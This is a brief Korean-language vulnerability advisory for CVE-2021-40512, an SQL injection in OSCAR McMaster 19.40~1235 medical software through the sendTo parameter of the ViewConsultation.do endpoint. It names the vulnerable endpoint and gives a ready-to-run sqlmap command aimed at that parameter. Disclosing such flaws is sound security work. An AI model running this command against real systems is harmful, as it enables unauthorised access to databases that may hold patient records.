
CVE-2021-40512 OSCAR McMaster 19.40~1235 SQL 인젝션 취약점.
OSCAR McMaster 19.40~1235 버전에는 SQL 인젝션 취약점이 존재합니다. 악의적인 공격자는 /oscar/oscarEncounter/ViewConsultation.do 엔드포인트에 있는 취약한 sendTo 매개변수를 통해 MySQL/MariaDB 데이터베이스에 SQL 명령을 실행할 수 있습니다.
[cve.mitre 자리 표시자]
[nist 자리 표시자]
취약한 JSP 페이지:
ViewConsultation.do - sendTo 매개변수
취약한 페이로드:
sqlmap -u "/oscar/oscarEncounter/ViewConsultation.do?sendTo=&startDate=&endDate=&searchDate=0¤tTeam=&orderby=2&desc=0&offset=&limit=100&mrpNo=&patientId=&serviceFilter=&consultantFilter=&urgencyFilter=" --cookie= -p sendTo --banner
발견자: Jack McBride, 2021년 8월